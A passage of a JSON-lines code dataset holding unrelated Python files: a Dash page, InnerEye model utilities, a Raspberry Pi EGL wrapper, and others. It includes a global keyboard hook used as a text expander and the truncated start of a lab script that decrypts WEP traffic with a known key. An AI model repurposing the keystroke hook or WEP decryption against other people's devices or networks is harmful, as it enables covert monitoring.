'\\\\\"')\n run_through_shell(\n f'python3 {tools_dir}/get_flops.py'\n f' {config_path}'\n f' --shape {image_shape}'\n f' 
--out {res_complexity}'\n f'{update_config}')\n\n with open(res_complexity) as read_file:\n content = json.load(read_file)\n\n return content\n","sub_path":"ote/ote/modules/evaluators/mmaction.py","file_name":"mmaction.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349416586","text":"import dash\nfrom dash import html, dcc, Input, Output, State, callback\nimport dash_bootstrap_components as dbc\n\ndash.register_page(__name__, path='/docSpectInstructions2')\n\ntable_header = [\n html.Thead(html.Tr([html.Th(\"Company Name\"), html.Th(\"T for C\"), html.Th(\"T for C confidence\"), html.Th(\"Value ($)\"), html.Th(\"Impact\"),html.Th(\"Reviewed\")\n ]))\n]\nrow1 = html.Tr([html.Td(\"Company A\"), html.Td(\"Yes\"), html.Td(\"1.0\"),html.Td(\"900,000\"),html.Td(\"27,000\"),html.Td(\"Yes\")],style={'color':'green'})\nrow2 = html.Tr([html.Td(\"Company B\"), html.Td(\"No\"), html.Td(\"1.0\"),html.Td(\"90,000\"),html.Td(\"25,200\"),html.Td(\"Yes\")],style={'color':'red'})\nrow3 = html.Tr([html.Td(\"Company C\"), html.Td(\"Yes\"), html.Td(\"0.85\"),html.Td(\"150,000\"),html.Td(\"22,500\"),html.Td(\"No\")])\nrow4 = html.Tr([html.Td(\"Company D\"), html.Td(\"Yes\"), html.Td(\"0.95\"),html.Td(\"60,000\"),html.Td(\"3000\"),html.Td(\"No\")])\n\ntable_body = [html.Tbody([row1, row2, row3, row4])]\n\nlayout = html.Div(children=[\n html.H1(children='Training Part 2 : Estimating Contracts Total Value'),\n\n html.Div(children='''\n Let's say that after reviewing Contract A and B, you find that:\n '''),\n html.Div(children=\"The algorithm was correct for Company A, the clause it identified was a T for C clause.\", id=\"correctContract\",style={\"color\":\"green\"}),\n html.Div(children=\"The algorithm was wrong for Company B, the clause it identified was NOT a T for C clause.\",id=\"incorrectContract\",style={\"color\":\"red\"}),\n html.Br(),\n html.Div(children='''\n After you fixed the algorithm's mistake, this is what the updated table looks like.'''),\n html.Br(),\n dbc.Table(table_header + table_body, bordered=True, style={\"width\": \"50%\", \"text-align\": \"right\"}),\n html.Br(),\n html.Header(\"INSERT BOX PLOT AND INSIGHTS HERE\"),\n html.Div(children='''\n What would you estimate the total value across contracts with T for C clauses? To help you out, we provided some graphs and insights.'''),\n html.Br(),\n dcc.Input(\n id=\"estimateInput\",\n type=\"number\",\n placeholder=\"enter your estimate\",\n ),\n #insert graphs here\n# html.Div(children='''\n# But wait, what about company C and D? Even though you have not reviewed them, we know how likely it is for the algorithm to be correct based on its confidence. 
Using this information, we can estimate a range for the total potential revenue loss across all four contracts.\n#     '''),\n#     html.Br(),\n    html.A(dbc.Button(\"Submit\"), href='/docSpectInstructions3'),\n\n], style={'margin-left': '150px', 'margin-right': '150px', 'margin-top': '50px'})\n\n# @callback(\n#     [Output(\"correctContract\", \"children\"), Output(\"incorrectContract\", \"children\")],\n#     Input(\"choiceChecklist\", \"value\"),\n# )\n# def checklistValidation(checklistSelected):\n#     print(checklistSelected)\n#     correctText = \"The clause identified by the T for C algorithm in Contract \" + checklistSelected[0] + \" is a T for C\"\n#     incorrectText = \"The clause identified by the T for C algorithm in Contract \" + checklistSelected[1] + \" is a T for C\"\n#     return correctText, incorrectText\n#\n","sub_path":"DocSpect-main/dash_pdf_components/pagesTestOld/docSpectInstructions2.py","file_name":"docSpectInstructions2.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"73596066","text":"#!/usr/bin/env python3\n# coding: utf8\n\nimport pyxhook\nimport time\nimport autopy\n\nk = list()\ncorrespondance = {\"cdt\":\"Cordialement\",\"bye\":\"aurevoir\",\"slt\":\"Salut\",\"res\":\"Veuillez agréer mes profonds respects\"}\n\ndef kbevent(event):\n    global running\n    k.append(event.Key)\n\n    # Do the transformation\n    if event.Ascii == 192: # if F3 pressed\n        chaine = \"\"\n        v = k[-4:]\n        les_trois_derniers = v[:3]\n        for e in les_trois_derniers:\n            chaine += e\n\n        if chaine in correspondance:\n            autopy.key.type_string(correspondance[chaine])\n\n# Create hookmanager\nhookman = pyxhook.HookManager()\n# Define our callback to fire when a key is pressed down\nhookman.KeyDown = kbevent\n# Hook the keyboard\nhookman.HookKeyboard()\n# Start our listener\nhookman.start()\n\n# Create a loop to keep the application running\nrunning = True\nwhile running:\n    time.sleep(0.1)\n\n# Close the listener when we are done\nhookman.cancel()\n","sub_path":"autowrite.py","file_name":"autowrite.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"499093364","text":"# ------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License (MIT). 
See LICENSE in the repo root for license information.\n# ------------------------------------------------------------------------------------------\nimport logging\nimport os\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Any, List, Optional, Union\n\nimport torch\nfrom torch.optim.optimizer import Optimizer\nfrom torch.optim.rmsprop import RMSprop\n\nfrom InnerEye.Azure.azure_util import RUN_CONTEXT\nfrom InnerEye.ML.common import ModelExecutionMode\nfrom InnerEye.ML.config import ModelArchitectureConfig, PaddingMode, SegmentationModelBase, \\\n basic_size_shrinkage\nfrom InnerEye.ML.deep_learning_config import OptimizerType\nfrom InnerEye.ML.model_config_base import ModelConfigBase\nfrom InnerEye.ML.model_training_steps import get_scalar_model_inputs_and_labels\nfrom InnerEye.ML.models.architectures.base_model import BaseModel, CropSizeConstraints\nfrom InnerEye.ML.models.architectures.complex import ComplexModel\nfrom InnerEye.ML.models.architectures.unet_2d import UNet2D\nfrom InnerEye.ML.models.architectures.unet_3d import UNet3D\nfrom InnerEye.ML.models.layers.basic import BasicLayer\nfrom InnerEye.ML.models.parallel.data_parallel import DataParallelModel\nfrom InnerEye.ML.scalar_config import ScalarModelBase\nfrom InnerEye.ML.sequence_config import SequenceModelBase\nfrom InnerEye.ML.utils.device_aware_module import DeviceAwareModule\nfrom InnerEye.ML.utils.metrics_constants import LoggingColumns\nfrom InnerEye.ML.utils.ml_util import RandomStateSnapshot, is_gpu_available\nfrom InnerEye.ML.utils.temperature_scaling import ModelWithTemperature\nfrom InnerEye.ML.visualizers.model_summary import ModelSummary\n\nBaseModelOrDataParallelModel = Union[DeviceAwareModule, DataParallelModel]\n\n\n@dataclass\nclass ModelAndInfo:\n \"\"\"\n A holder for a model and, optionally, associated information.\n model: any model\n optimizer: associated optimizer if any\n is_mean_teacher: whether this is (intended to be) a mean teacher model\n is_adjusted: whether model adjustments (which cannot be done twice) have been applied\n checkpoint_epoch: the training epoch this model was created, if loaded from disk\n model_execution_mode: mode this model will be run in\n \"\"\"\n model: BaseModelOrDataParallelModel\n optimizer: Optional[Optimizer] = None\n is_mean_teacher: bool = False\n is_adjusted: bool = False\n checkpoint_epoch: Optional[int] = None\n model_execution_mode: ModelExecutionMode = ModelExecutionMode.TEST\n\n def to_cuda(self) -> None:\n assert self.model is not None\n self.model = self.model.cuda()\n\n def set_data_parallel(self, device_ids: Optional[List[Any]]) -> None:\n assert self.model is not None\n self.model = DataParallelModel(self.model, device_ids=device_ids)\n\n\ndef init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n \"\"\"\n Initialize the weights of a Pytorch module.\n\n :param m: A PyTorch module. 
Only Conv3d and BatchNorm3d are initialized.\n \"\"\"\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n\n\n# noinspection PyTypeChecker\ndef build_net(args: SegmentationModelBase) -> BaseModel:\n \"\"\"\n Build network architectures\n\n :param args: Network configuration arguments\n \"\"\"\n full_channels_list = [args.number_of_image_channels, *args.feature_channels, args.number_of_classes]\n initial_fcn = [BasicLayer] * 2\n residual_blocks = [[BasicLayer, BasicLayer]] * 3\n basic_network_definition = initial_fcn + residual_blocks # type: ignore\n # no dilation for the initial FCN and then a constant 1 neighbourhood dilation for the rest residual blocks\n basic_dilations = [1] * len(initial_fcn) + [2, 2] * len(basic_network_definition)\n # Crop size must be at least 29 because all architectures (apart from UNets) shrink the input image by 28\n crop_size_constraints = CropSizeConstraints(minimum_size=basic_size_shrinkage + 1)\n run_weight_initialization = True\n\n network: BaseModel\n if args.architecture == ModelArchitectureConfig.Basic:\n network_definition = basic_network_definition\n network = ComplexModel(args, full_channels_list,\n basic_dilations, network_definition, crop_size_constraints) # type: ignore\n\n elif args.architecture == ModelArchitectureConfig.UNet3D:\n network = UNet3D(input_image_channels=args.number_of_image_channels,\n initial_feature_channels=args.feature_channels[0],\n num_classes=args.number_of_classes,\n kernel_size=args.kernel_size)\n run_weight_initialization = False\n\n elif args.architecture == ModelArchitectureConfig.UNet2D:\n network = UNet2D(input_image_channels=args.number_of_image_channels,\n initial_feature_channels=args.feature_channels[0],\n num_classes=args.number_of_classes,\n padding_mode=PaddingMode.Edge)\n run_weight_initialization = False\n\n else:\n raise ValueError(\"Unknown model architecture {}\".format(args.architecture))\n network.validate_crop_size(args.crop_size, \"Training crop size\")\n network.validate_crop_size(args.test_crop_size, \"Test crop size\") # type: ignore\n # Initialize network weights\n if run_weight_initialization:\n network.apply(init_weights) # type: ignore\n return network\n\n\ndef update_model_for_multiple_gpus(model_and_info: ModelAndInfo,\n args: ModelConfigBase,\n execution_mode: ModelExecutionMode = ModelExecutionMode.TRAIN) -> \\\n ModelAndInfo:\n \"\"\"\n Updates a given torch model as such input mini-batches are parallelized across the batch dimension to utilise\n multiple gpus. If model parallel is set to True and execution is in test mode, then model is partitioned to\n perform full volume inference.\n :param model_and_info: The torch module object representing the network and the optimizer.\n :param args: The arguments object with attributes used to enable amp training and create the parallel model.\n :param execution_mode: mode, i.e. 
train or test\n :return: Updated torch model and optimizer.\n \"\"\"\n if model_and_info.is_adjusted:\n logging.debug(\"model_and_info.is_adjusted is already True\")\n return model_and_info\n if args.use_gpu:\n # In the normal training codepath, the model should already be on the GPU, but in some tests not.\n model_and_info.to_cuda()\n logging.info(\"Adjusting the model to use mixed precision training.\")\n # If model parallel is set to True, then partition the network across all available gpus.\n if args.use_model_parallel:\n devices = args.get_cuda_devices()\n assert devices is not None # for mypy\n model_and_info.model.partition_model(devices=devices) # type: ignore\n else:\n logging.info(\"Making no adjustments to the model because no GPU was found.\")\n\n # Update model related config attributes (After Model Parallel Activated)\n args.adjust_after_mixed_precision_and_parallel(model_and_info.model)\n\n # DataParallel enables running the model with multiple gpus by splitting samples across GPUs\n # If the model is used in training mode, data parallel is activated by default.\n # Similarly, if model parallel is not activated, data parallel is used as a backup option\n use_data_parallel = (execution_mode == ModelExecutionMode.TRAIN) or (not args.use_model_parallel)\n if args.use_gpu and use_data_parallel:\n logging.info(\"Adjusting the model to use DataParallel\")\n # Move all layers to the default GPU before activating data parallel.\n # This needs to happen even though we put the model to the GPU at the beginning of the method,\n # but we may have spread it across multiple GPUs later.\n model_and_info.to_cuda()\n model_and_info.set_data_parallel(device_ids=args.get_cuda_devices())\n\n model_and_info.is_adjusted = True\n logging.debug(\"model_and_info.is_adjusted set to True\")\n return model_and_info\n\n\ndef create_optimizer(args: ModelConfigBase, model: torch.nn.Module) -> Optimizer:\n \"\"\"\n Creates a torch optimizer for the given model.\n\n :param args: The arguments object with attributes used to create the optimizer_type.\n :param model: The DataParallel object representing the network.\n :return: An instance of torch.optim.Optimizer\n \"\"\"\n # Select optimizer type\n if args.optimizer_type in [OptimizerType.Adam, OptimizerType.AMSGrad]:\n return torch.optim.Adam(model.parameters(), args.l_rate, args.adam_betas, args.opt_eps, args.weight_decay,\n amsgrad=args.optimizer_type == OptimizerType.AMSGrad)\n elif args.optimizer_type == OptimizerType.SGD:\n return torch.optim.SGD(model.parameters(), args.l_rate, args.momentum,\n weight_decay=args.weight_decay)\n elif args.optimizer_type == OptimizerType.RMSprop:\n return RMSprop(model.parameters(), args.l_rate, args.rms_alpha, args.opt_eps,\n args.weight_decay, args.momentum)\n else:\n raise NotImplementedError(f\"Optimizer type {args.optimizer_type.value} is not implemented\")\n\n\ndef summary_for_segmentation_models(config: ModelConfigBase, model: DeviceAwareModule) -> None:\n \"\"\"\n Generates a human readable summary of the present segmentation model, writes it to logging.info, and\n stores the ModelSummary object inside the argument `model`.\n\n :param config: The configuration for the model.\n :param model: The instantiated Pytorch model.\n \"\"\"\n assert isinstance(model, BaseModel)\n crop_size = config.crop_size\n if isinstance(crop_size, int):\n crop_size = (crop_size, crop_size, crop_size)\n try:\n model.generate_model_summary(crop_size, log_summaries_to_files=config.log_summaries_to_files)\n except AttributeError as e:\n 
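# summary generation is treated as best-effort here: a failure is logged below rather than raised\n        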
logging.warning(f\"summary_for_segmentation_models failed with exception {e}\")\n\n\ndef generate_and_print_model_summary(config: ModelConfigBase, model: DeviceAwareModule) -> None:\n \"\"\"\n Writes a human readable summary of the present model to logging.info, and logs the number of trainable\n parameters to AzureML.\n\n :param config: The configuration for the model.\n :param model: The instantiated Pytorch model.\n \"\"\"\n random_state = RandomStateSnapshot.snapshot_random_state()\n # There appears to be a bug in apex, where previous use (in training for example) causes problems\n # when another model is later built on the CPU (for example, before loading from a checkpoint)\n # https://github.com/NVIDIA/apex/issues/694\n # Hence, move the model to the GPU before doing model summary.\n if config.use_gpu:\n model = model.cuda()\n if isinstance(config, ScalarModelBase):\n # To generate the model summary, read the first item of the dataset. Then use the model's own\n # get_model_input function to convert the dataset item to input tensors, and feed them through the model.\n train_dataset = config.get_torch_dataset_for_inference(ModelExecutionMode.TRAIN)\n train_item_0 = next(iter(train_dataset.as_data_loader(shuffle=False, batch_size=1, num_dataload_workers=0)))\n model_inputs = get_scalar_model_inputs_and_labels(config, model, train_item_0).model_inputs\n # The model inputs may already be converted to float16, assuming that we would do mixed precision.\n # However, the model is not yet converted to float16 when this function is called, hence convert back to float32\n summary = ModelSummary(model)\n summary.generate_summary(input_tensors=model_inputs, log_summaries_to_files=config.log_summaries_to_files)\n elif config.is_segmentation_model:\n summary_for_segmentation_models(config, model)\n assert model.summarizer\n summary = model.summarizer # type: ignore\n else:\n raise ValueError(\"Don't know how to generate a summary for this type of model?\")\n RUN_CONTEXT.log(LoggingColumns.NumTrainableParameters, summary.n_trainable_params)\n random_state.restore_random_state()\n\n\ndef load_checkpoint(model: torch.nn.Module,\n path_to_checkpoint: Path,\n optimizer: Optional[Optimizer] = None,\n optimizer_to_gpu: Optional[bool] = False) -> Optional[int]:\n \"\"\"\n Loads a checkpoint of a model.\n The epoch of the stored model and the epoch provided as argument must match.\n The provided model must match the stored model.\n\n :param model: The DataParallel object representing the network. Must have the same architecture of the stored model.\n :param path_to_checkpoint: The path to the checkpoint file.\n :param optimizer: The optimizer used for training\n :param optimizer_to_gpu: If true, move the optimizer to GPU, which we need to do if the model is also on GPU.\n :return: The checkpoint epoch if loaded and None if not loaded\n \"\"\"\n\n if not path_to_checkpoint.is_file():\n logging.warning(f'No checkpoint found at {path_to_checkpoint} current working dir {os.getcwd()}')\n return None\n\n logging.info(f\"Loading checkpoint {path_to_checkpoint}\")\n # For model debugging, allow loading a GPU trained model onto the CPU. 
This will clearly only work\n # if the model is small.\n map_location = None if is_gpu_available() else 'cpu'\n checkpoint = torch.load(str(path_to_checkpoint), map_location=map_location)\n\n if isinstance(model, torch.nn.DataParallel):\n model.module.load_state_dict(checkpoint['state_dict'])\n else:\n model.load_state_dict(checkpoint['state_dict'])\n\n if optimizer is not None:\n opt_dict = checkpoint['opt_dict']\n if optimizer_to_gpu:\n # https://github.com/pytorch/pytorch/issues/2830\n for key, val in opt_dict.items():\n if isinstance(val, torch.Tensor):\n opt_dict[key] = val.cuda()\n optimizer.load_state_dict(opt_dict)\n\n logging.info(\"Loaded checkpoint (epoch: {})\".format(checkpoint['epoch']))\n return checkpoint['epoch']\n\n\ndef save_checkpoint(model: torch.nn.Module, optimizer: Optimizer, epoch: int,\n args: ModelConfigBase, mean_teacher_model: bool = False) -> None:\n \"\"\"\n Saves a checkpoint of the current model and optimizer_type parameters in the specified folder\n and uploads it to the output blob storage of the current run context.\n The checkpoint's name for epoch 123 would be 123_checkpoint.pth.tar.\n\n :param model: A DataParallel object representing the model.\n :param optimizer: The optimizer_type used for training.\n :param epoch: The last epoch used to train the model.\n :param args:\n :param mean_teacher_model: If True save to the mean teacher model checkpoint path.\n \"\"\"\n logging.getLogger().disabled = True\n\n model_state_dict = model.module.state_dict() if isinstance(model, torch.nn.DataParallel) else model.state_dict()\n checkpoint_file_path = args.get_path_to_checkpoint(epoch, mean_teacher_model)\n info_to_store = {\n 'epoch': epoch,\n 'state_dict': model_state_dict,\n 'opt_dict': optimizer.state_dict()\n }\n torch.save(info_to_store, checkpoint_file_path)\n logging.getLogger().disabled = False\n logging.info(\"Saved model checkpoint for epoch {} to {}\".format(epoch, checkpoint_file_path))\n\n\ndef load_from_checkpoint_and_adjust(model_config: ModelConfigBase,\n path_to_checkpoint: Path,\n model_and_info: Optional[ModelAndInfo] = None) -> ModelAndInfo:\n \"\"\"\n Creates a model as per the configuration, and loads the parameters from the given checkpoint path.\n The model is then adjusted for data parallelism and mixed precision, running in TEST mode.\n\n :param model_config: The configuration from which an empty model will be created (if existing_model is None)\n :param path_to_checkpoint: The path to the checkpoint file.\n :param model_and_info: optional model and associated info; created from model_config if None\n :return: The model with all loaded parameters, the (adjusted) optimizer, and the epoch in which the model was saved.\n If the checkpoint_epoch is None, there is no model file at the given path.\n \"\"\"\n # Create model if necessary\n if model_and_info is None:\n model_and_info = ModelAndInfo(create_model_with_temperature_scaling(model_config))\n # Load the stored model. 
If there is no checkpoint present, return immediately.\n model_and_info.checkpoint_epoch = load_checkpoint(model=model_and_info.model,\n path_to_checkpoint=path_to_checkpoint,\n optimizer=model_and_info.optimizer,\n optimizer_to_gpu=model_config.use_gpu)\n if model_and_info.checkpoint_epoch is None:\n return model_and_info\n # Enable data/model parallelization\n if model_config.is_segmentation_model:\n # Generate the model summary, which is required for model partitioning across GPUs.\n summary_for_segmentation_models(model_config, model_and_info.model)\n return update_model_for_multiple_gpus(\n model_and_info, args=model_config, execution_mode=model_and_info.model_execution_mode)\n\n\ndef create_model_with_temperature_scaling(config: ModelConfigBase) -> Any:\n \"\"\"\n Create a model with temperature scaling by wrapping the result of config.create_model with ModelWithTemperature,\n if temperature scaling config has been provided, otherwise return the result of config.create_model\n \"\"\"\n # wrap the model around a temperature scaling model if required\n model = config.create_model()\n if isinstance(config, SequenceModelBase) and config.temperature_scaling_config:\n model = ModelWithTemperature(model, config.temperature_scaling_config)\n return model\n","sub_path":"InnerEye/ML/utils/model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":18393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"535225028","text":"#\n# Copyright (c) 2012 Peter de Rivaz\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted.\n#\n# Raspberry Pi 3d demo using OpenGLES 2.0 via Python\n#\n# Version 0.1 (Draws a rectangle using vertex and fragment shaders)\n# Version 0.2 (Draws a Julia set on top of a Mandelbrot controlled by the mouse. 
Mandelbrot rendered to texture in advance.\n\nimport ctypes\nimport time\nimport math\n# Pick up our constants extracted from the header files with prepare_constants.py\nfrom .egl import *\nfrom .gl2 import *\nfrom .gl2ext import *\n\n# Define verbose=True to get debug messages\nverbose = True\n\n# Define some extra constants that the automatic extraction misses\nEGL_DEFAULT_DISPLAY = 0\nEGL_NO_CONTEXT = 0\nEGL_NO_DISPLAY = 0\nEGL_NO_SURFACE = 0\nDISPMANX_PROTECTION_NONE = 0\n\n# Open the libraries\nbcm = ctypes.CDLL('libbcm_host.so')\nopengles = ctypes.CDLL('libbrcmGLESv2.so')\nopenegl = ctypes.CDLL('libbrcmEGL.so')\n\neglint = ctypes.c_int\n\neglshort = ctypes.c_short\n\ndef eglints(L):\n \"\"\"Converts a tuple to an array of eglints (would a pointer return be better?)\"\"\"\n return (eglint*len(L))(*L)\n\neglfloat = ctypes.c_float\n\ndef eglfloats(L):\n return (eglfloat*len(L))(*L)\n\ndef check(e):\n \"\"\"Checks that error is zero\"\"\"\n if e==0: return\n if verbose:\n print('Error code',hex(e&0xffffffff))\n raise ValueError\n\nclass EGL(object):\n\n def __init__(self,depthbuffer=False):\n \"\"\"Opens up the OpenGL library and prepares a window for display\"\"\"\n b = bcm.bcm_host_init()\n assert b==0\n self.display = openegl.eglGetDisplay(EGL_DEFAULT_DISPLAY)\n assert self.display\n r = openegl.eglInitialize(self.display,0,0)\n assert r\n if depthbuffer:\n attribute_list = eglints( (EGL_RED_SIZE, 8,\n EGL_GREEN_SIZE, 8,\n EGL_BLUE_SIZE, 8,\n EGL_ALPHA_SIZE, 8,\n EGL_SURFACE_TYPE, EGL_WINDOW_BIT,\n EGL_DEPTH_SIZE, 16,\n EGL_NONE) )\n else:\n attribute_list = eglints( (EGL_RED_SIZE, 8,\n EGL_GREEN_SIZE, 8,\n EGL_BLUE_SIZE, 8,\n EGL_ALPHA_SIZE, 8,\n EGL_SURFACE_TYPE, EGL_WINDOW_BIT,\n EGL_NONE) )\n # EGL_SAMPLE_BUFFERS, 1,\n # EGL_RENDERABLE_TYPE, EGL_OPENGL_ES2_BIT,\n\n numconfig = eglint()\n config = ctypes.c_void_p()\n r = openegl.eglChooseConfig(self.display,\n ctypes.byref(attribute_list),\n ctypes.byref(config), 1,\n ctypes.byref(numconfig));\n assert r\n r = openegl.eglBindAPI(EGL_OPENGL_ES_API)\n assert r\n if verbose:\n print('numconfig=',numconfig)\n context_attribs = eglints( (EGL_CONTEXT_CLIENT_VERSION, 2, EGL_NONE) )\n self.context = openegl.eglCreateContext(self.display, config,\n EGL_NO_CONTEXT,\n ctypes.byref(context_attribs))\n assert self.context != EGL_NO_CONTEXT\n width = eglint()\n height = eglint()\n s = bcm.graphics_get_display_size(0,ctypes.byref(width),ctypes.byref(height))\n self.width = width\n self.height = height\n assert s>=0\n dispman_display = bcm.vc_dispmanx_display_open(0)\n dispman_update = bcm.vc_dispmanx_update_start( 0 )\n dst_rect = eglints( (0,0,width.value,height.value) )\n src_rect = eglints( (0,0,width.value<<16, height.value<<16) )\n assert dispman_update\n assert dispman_display\n dispman_element = bcm.vc_dispmanx_element_add ( dispman_update, dispman_display,\n 0, ctypes.byref(dst_rect), 0,\n ctypes.byref(src_rect),\n DISPMANX_PROTECTION_NONE,\n 0 , 0, 0)\n bcm.vc_dispmanx_update_submit_sync( dispman_update )\n nativewindow = eglints((dispman_element,width,height));\n nw_p = ctypes.pointer(nativewindow)\n self.nw_p = nw_p\n self.surface = openegl.eglCreateWindowSurface( self.display, config, nw_p,\n eglints((EGL_RENDER_BUFFER, EGL_SINGLE_BUFFER, EGL_NONE)) )\n assert self.surface != EGL_NO_SURFACE\n r = openegl.eglMakeCurrent(self.display, self.surface, self.surface, self.context)\n assert 
r\n\n\n","sub_path":"pyopengles/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"58756809","text":"import xarray as xr\n\n\ndef to_rho(var, grid, boundary='extend'):\n if var.dims[-1] != 'xi_rho':\n var = grid.interp(var, 'X', to='center', boundary=boundary)\n if var.dims[-2] != 'eta_rho':\n var = grid.interp(var, 'Y', to='center', boundary=boundary)\n return var\n\n\ndef to_psi(var, grid, boundary='extend'):\n if var.dims[-1] != 'xi_u':\n var = grid.interp(var, 'X', to='inner', boundary=boundary)\n if var.dims[-2] != 'eta_v':\n var = grid.interp(var, 'Y', to='inner', boundary=boundary)\n return var\n\n\ndef xisoslice(iso_array, iso_value, projected_array, coord):\n '''Calculate an isosurface\n\n This function calculates the value of projected_array on\n an isosurface in the array iso_array defined by iso_val.\n\n Inputs:\n iso_array: xarray.DataArray in which the isosurface is defined\n iso_value: float: value of the isosurface in iso_array\n projected_array: xarray.DataArray in which to project values on the isosurface\n Needs to have the same dimensions and shape as iso_array\n coord: string: coordinate associated with the dimension along which to project\n\n Output:\n iso_values: xarray.DataArray: values of projected_array on the isosurface\n '''\n Nm = len(iso_array[coord]) - 1\n\n lslice = {coord: slice(None, -1)}\n uslice = {coord: slice(1, None)}\n\n prop = iso_array - iso_value\n\n propl = prop.isel(**lslice)\n propl.coords[coord] = np.arange(Nm)\n propu = prop.isel(**uslice)\n propu.coords[coord] = np.arange(Nm)\n\n zc = xr.where((propu*propl)<0.0, 1.0, 0.0)\n\n varl = projected_array.isel(**lslice)\n varl.coords[coord] = np.arange(Nm)\n varu = projected_array.isel(**uslice)\n varu.coords[coord] = np.arange(Nm)\n\n propl = (propl*zc).sum(coord)\n propu = (propu*zc).sum(coord)\n varl = (varl*zc).sum(coord)\n varu = (varu*zc).sum(coord)\n\n return varl - propl*(varu-varl)/(propu-propl)\n","sub_path":"xroms/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"10973433","text":"# make a histogra of dihedral angles for ring orientation \n# Derek Fujimoto\n# Jan 2018\n\nfrom Film import Film\nfrom PsSim import PsSim \nimport pandas as pd\nimport numpy as np\n\n# Settings\nfilename = \"5_stab%d_angles.csv\"\ndirectory = '../seed12345/'\nfilebase = '5_stab%d'\nring_draw_id = 0\nnbins = 1000\ntimestep = 2e-6 # ns / timestep\nnproc = 4\n\nT = np.arange(410,501,10)\n\n# Fetch angles\nfor t in T:\n film = Film(directory+filebase%t,datafile=directory+'unitedAtom.data')\n film.nproc = nproc\n film.get_ring_angles(filename%t)\n del film\n","sub_path":"film2_UA/attempt1/15nm/analysis/get_angles.py","file_name":"get_angles.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"653317165","text":"from django.conf.urls import url\n\nfrom . 
import views\n\n\nurlpatterns = [\n    url(r'^(?P\d+)/$', views.CommentCreate.as_view(), name='comments_comment_create'),\n    url(r'^upvote/(?P\d+)/$', views.upvote, name='comments_comment_upvote'),\n    url(r'^downvote/(?P\d+)/$', views.downvote, name='comments_comment_downvote'),\n]\n","sub_path":"comments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"136435859","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/lib/python3.8/site-packages/nielsen/files.py\n# Compiled at: 2020-05-04 00:23:44\n# Size of source mod 2**32: 1932 bytes\n\"\"\"\nSystem-level file operations needed by the API. These functions operate on the\nvarious Path class objects provided by the pathlib library. These functions\nprobably won't ever need to be called directly by a client.\n\"\"\"\nimport logging\nfrom shutil import chown, move as su_move\nfrom nielsen.config import CONFIG\n\ndef set_file_mode(file):\n    \"\"\"Set the mode of `file` to the value defined in `CONFIG`.\"\"\"\n    if CONFIG.get('Options', 'Mode'):\n        try:\n            file.chmod(int(CONFIG.get('Options', 'Mode'), 8))\n        except PermissionError as err:\n            logging.error('chmod failed. %s', err)\n            raise\n\n\ndef set_file_ownership(file):\n    \"\"\"Set owner and group of `file` to the values defined in `CONFIG`.\"\"\"\n    if CONFIG.get('Options', 'User') or CONFIG.get('Options', 'Group'):\n        try:\n            chown(file, CONFIG.get('Options', 'User') or None, CONFIG.get('Options', 'Group') or None)\n        except PermissionError as err:\n            logging.error('chown failed. %s', err)\n            raise\n\n\ndef create_hierarchy(file):\n    \"\"\"Create the directory hierarchy for the given `file`.\"\"\"\n    try:\n        file.parent.mkdir(mode=(int(CONFIG.get('Options', 'mode'), 8)), parents=True,\n                          exist_ok=True)\n        logging.debug('Created: %s', file.parent)\n    except FileExistsError:\n        logging.debug('%s already exists', file.parent)\n    except PermissionError as err:\n        logging.error(err)\n        raise\n\n\ndef move(src, dst):\n    \"\"\"Move the file `src` to the path `dst`, but do not overwrite existing files.\"\"\"\n    if dst.exists() or src == dst:\n        logging.debug('%s already in MediaPath. 
File will not be moved.', dst)\n        return\n    try:\n        su_move(src, dst)\n    except PermissionError as err:\n        logging.error(err)\n        raise","sub_path":"pycfiles/Nielsen-2.2.0.linux-x86_64.tar/files.cpython-38.py","file_name":"files.cpython-38.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}{"seq_id":"108874027","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Manually decrypt a wep message given the WEP key\"\"\"\n\n__author__ = \"Abraham Rubinstein\"\n__copyright__ = \"Copyright 2017, HEIG-VD\"\n__license__ \t= \"GPL\"\n__version__ \t= \"1.0\"\n__email__ \t\t= \"abraham.rubinstein@heig-vd.ch\"\n__status__ \t\t= \"Prototype\"\n\nfrom scapy.all import *\nimport binascii\nimport zlib\nfrom rc4 import RC4\n\nif len(sys.argv) == 3: # key and message were passed on the command line\n    key = binascii.unhexlify(sys.argv[1].replace(\":\", \"\"))\n    message = binascii.unhexlify(sys.argv[2].replace(\":\", \"\"))\nelse: # otherwise print usage and exit\n    print(\"%s \" % sys.argv[0])\n    print(\"\\tkey has 